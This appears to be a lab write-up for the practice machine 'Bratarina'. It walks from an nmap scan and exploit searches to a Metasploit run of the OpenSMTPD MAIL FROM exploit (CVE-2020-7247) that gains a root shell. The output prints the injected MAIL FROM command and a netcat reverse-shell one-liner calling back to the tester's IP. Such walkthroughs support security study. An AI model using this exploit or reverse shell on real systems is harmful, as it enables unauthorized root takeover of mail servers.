# Bratarina

## Intro

```
# Nmap 7.94SVN scan initiated Fri Mar 22 09:11:34 2024 as: nmap -sC -sV -vv -oA nmap/initial bratarina.pg
Nmap scan report for bratarina.pg (192.168.202.71)
Host is up, received echo-reply ttl 61 (0.040s latency).
Scanned at 2024-03-22 09:11:36 CDT for 51s
Not shown: 995 filtered tcp ports (no-response)
PORT    STATE  SERVICE     REASON         VERSION
22/tcp  open   ssh         syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:dd:2c:ea:2f:85:c5:89:bc:fc:e9:a3:38:f0:d7:50 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJ0GZmmFtQUJbj2HgPsye2Xccyyh9mC8fsCwIivM4x3o3mwZDNi6g+Y6nIs5SuOJj2IpS+E9O5wB71MSIv7d7XYrd6paprfvnvMCyAQ9VTn8py6CQ/OsgeOITU+JnAxoe3WQklpyAVqhJ7ASqAInZF8oHDaebr6gBKEq4nkoLOtJSZeB8xWDHhbQZjG6AY81Y2mHPZH/LC4gSXpSmw+3h0zhlCN/kxeyhjrsrZqIVdKhg4emds8+gQyu1Wrz4AUUBGscI6Sh5rjImr+SC4rAGgn6N0MVPcZA1mS0JUplz758Y3YFXstqO2SdaHB/Qb50fkcpclcYKibSbCv5ZLNzOf
|   256 e3:b7:65:c2:a7:8e:45:29:bb:62:ec:30:1a:eb:ed:6d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOWgZAzhJ+plc4Rk/YyGvQ1KOKK9j31ix1uCWIAirjnZS/lKwcvYrkG+lVsJRBnBYVA+67ILSJR2YNVz9uZshPE=
|   256 d5:5b:79:5b:ce:48:d8:57:46:db:59:4f:cd:45:5d:ef (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC2Z9krPXlbEN6Xl40sc3BiVLfhbtd+l5ZFNBKkF7pYT
25/tcp  open   smtp        syn-ack ttl 61 OpenSMTPD
| smtp-commands: bratarina Hello bratarina.pg [192.168.45.152], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info
53/tcp  closed domain      reset ttl 61
80/tcp  open   http        syn-ack ttl 61 nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title:         Page not found - FlaskBB        
445/tcp open   netbios-ssn syn-ack ttl 61 Samba smbd 4.7.6-Ubuntu (workgroup: COFFEECORP)
Service Info: Host: bratarina; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 22038/tcp): CLEAN (Timeout)
|   Check 2 (port 53384/tcp): CLEAN (Timeout)
|   Check 3 (port 21897/udp): CLEAN (Timeout)
|   Check 4 (port 39979/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2024-03-22T14:11:53
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: bratarina
|   NetBIOS computer name: BRATARINA\x00
|   Domain name: \x00
|   FQDN: bratarina
|_  System time: 2024-03-22T10:11:52-04:00
|_clock-skew: mean: 1h20m02s, deviation: 2h18m35s, median: 1s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 22 09:12:27 2024 -- 1 IP address (1 host up) scanned in 53.37 seconds
```

### Open Ports

* 22/tcp - OpenSSH 7.6p1
* 25/tcp - OpenSMTPD
* 80/tcp - nginx 1.14.0
* 445/tcp - Samba smbd 4.7.6

### OpenSMTPD Exploits

searchsploit results for OpenSMTPD. The banner carries no version string, so the MAIL FROM remote code execution module (CVE-2020-7247, OpenSMTPD 6.4.0 to 6.6.1) is tried first: it needs no credentials and its injected command runs with root privileges.

```
---------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)                                                        | linux/remote/48038.rb
OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)                                                    | linux/local/48185.rb
OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution                                    | openbsd/remote/48051.pl
OpenSMTPD 6.6.1 - Remote Code Execution                                                                         | linux/remote/47984.py
OpenSMTPD 6.6.3 - Arbitrary File Read                                                                           | linux/remote/48139.c
OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution                                        | openbsd/remote/48140.c
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

### Samba Exploits

searchsploit results for Samba. Every hit targets a 3.x release; the newest of them, the `is_known_pipename()` arbitrary module load (CVE-2017-7494), was fixed in 4.4.14/4.5.10/4.6.4 and does not affect the 4.7.6 build seen here, so SMB is noted and set aside.

```
---------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                                            | osx/remote/16875.rb
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                                          | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                | unix/remote/16320.rb
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)                                              | linux/remote/9950.rb
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                                          | linux/remote/16859.rb
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                                        | solaris/remote/16329.rb
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow                                                        | linux/dos/4732.c
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)                                               | multiple/dos/5712.pl
Samba 3.0.4 - SWAT Authorisation Buffer Overflow                                                                | linux/remote/364.pl
Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)                                         | linux_x86/remote/16860.rb
Samba 3.3.5 - Format String / Security Bypass                                                                   | linux/remote/33053.txt
Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit)                     | linux/remote/21850.rb
Samba 3.4.5 - Symlink Directory Traversal                                                                       | linux/remote/33599.txt
Samba 3.4.5 - Symlink Directory Traversal (Metasploit)                                                          | linux/remote/33598.rb
Samba 3.4.7/3.5.1 - Denial of Service                                                                           | linux/dos/12588.txt
Samba 3.5.0 - Remote Code Execution                                                                             | linux/remote/42060.py
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)                    | linux/remote/42084.rb
Samba 3.5.11/3.6.3 - Remote Code Execution                                                                      | linux/remote/37834.py
Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow                                                      | linux/dos/27778.txt
```

## Initial Foothold

```
msf6 exploit(unix/smtp/opensmtpd_mail_from_rce) > show options                                                                                    
                                                                                                                                                  
Module options (exploit/unix/smtp/opensmtpd_mail_from_rce):                                                                                       
                                                                                                                                                  
   Name     Current Setting  Required  Description                                                                                                
   ----     ---------------  --------  -----------                                                                                                
   RCPT_TO  root             yes       Valid mail recipient                                                                                       
   RHOSTS   bratarina.pg     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html     
   RPORT    25               yes       The target port (TCP)                                                                                      
                                                                                                                                                  
                                                                                                                                                  
Payload options (cmd/unix/reverse_netcat):                                                                                                        
                                                                                                                                                  
   Name   Current Setting  Required  Description                                                                                                  
   ----   ---------------  --------  -----------                                                                                                  
   LHOST  192.168.45.152   yes       The listen address (an interface may be specified)                                                           
   LPORT  80               yes       The listen port                                                                                              
                                                                                                                                                  
                                                                                                                                                  
Exploit target:                                                                                                                                   
                                                                                                                                                  
   Id  Name                                                                                                                                       
   --  ----                                                                                                                                       
   0   OpenSMTPD 6.4.0 - 6.6.1                                                                                                                    
                                                                                                                                                  
                                                                                                                                                  
                                                                                                                                                  
View the full module info with the info, or info -d command.                                                                                      
                                                             
msf6 exploit(unix/smtp/opensmtpd_mail_from_rce) > run                                                                                             

[*] Started reverse TCP handler on 192.168.45.152:80 
[*] 192.168.202.71:25 - Running automatic check ("set AutoCheck false" to disable)
[!] 192.168.202.71:25 - The service is running, but could not be validated.
[*] 192.168.202.71:25 - Connecting to OpenSMTPD
[*] 192.168.202.71:25 - Saying hello and sending exploit
[*] 192.168.202.71:25 - Expecting: /220.*OpenSMTPD/
[*] 192.168.202.71:25 - Sending: HELO Fu9Gr5sSrBNw0zZ2a
[*] 192.168.202.71:25 - Expecting: /250.*pleased to meet you/
[*] 192.168.202.71:25 - Sending: MAIL FROM:<;for l in M Q e 4 o v 1 D j E T t 8 M;do read l;done;sh;exit 0;>
[*] 192.168.202.71:25 - Expecting: /250.*Ok/
[*] 192.168.202.71:25 - Sending: RCPT TO:<root>
[*] 192.168.202.71:25 - Expecting: /250.*Recipient ok/
[*] 192.168.202.71:25 - Sending: DATA
[*] 192.168.202.71:25 - Expecting: /354 Enter mail.*itself/
[*] 192.168.202.71:25 - Sending: 
#
#
#
#
#
#
#
#
#
#
#
#
#
#
mkfifo /tmp/fnmudoa; nc 192.168.45.152 80 0</tmp/fnmudoa | /bin/sh >/tmp/fnmudoa 2>&1; rm /tmp/fnmudoa
[*] 192.168.202.71:25 - Sending: .
[*] 192.168.202.71:25 - Expecting: /250.*Message accepted for delivery/
[*] 192.168.202.71:25 - Sending: QUIT
[*] 192.168.202.71:25 - Expecting: /221.*Bye/
[*] Command shell session 1 opened (192.168.45.152:80 -> 192.168.202.71:42038) at 2024-03-22 10:06:00 -0500

whoami
root
pwd
/root
ls -la
total 28
drwx------  4 root root 4096 Mar 22 10:08 .
drwxr-xr-x 23 root root 4096 Jul  6  2020 ..
-rw-------  1 root root    0 Jul  9  2020 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwx------  2 root root 4096 Jul  6  2020 .cache
drwx------  3 root root 4096 Jul  6  2020 .gnupg
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   33 Mar 22 10:08 proof.txt
cat proof.txt
470915275876f89210c9911a6fa0c973
```

## Privilege Escalation

No privilege escalation step is needed. The MAIL FROM injection (CVE-2020-7247) is run by OpenSMTPD's root-privileged process when it hands the message to the local delivery agent, so the reverse shell lands as root straight away, as the `whoami` output above shows.
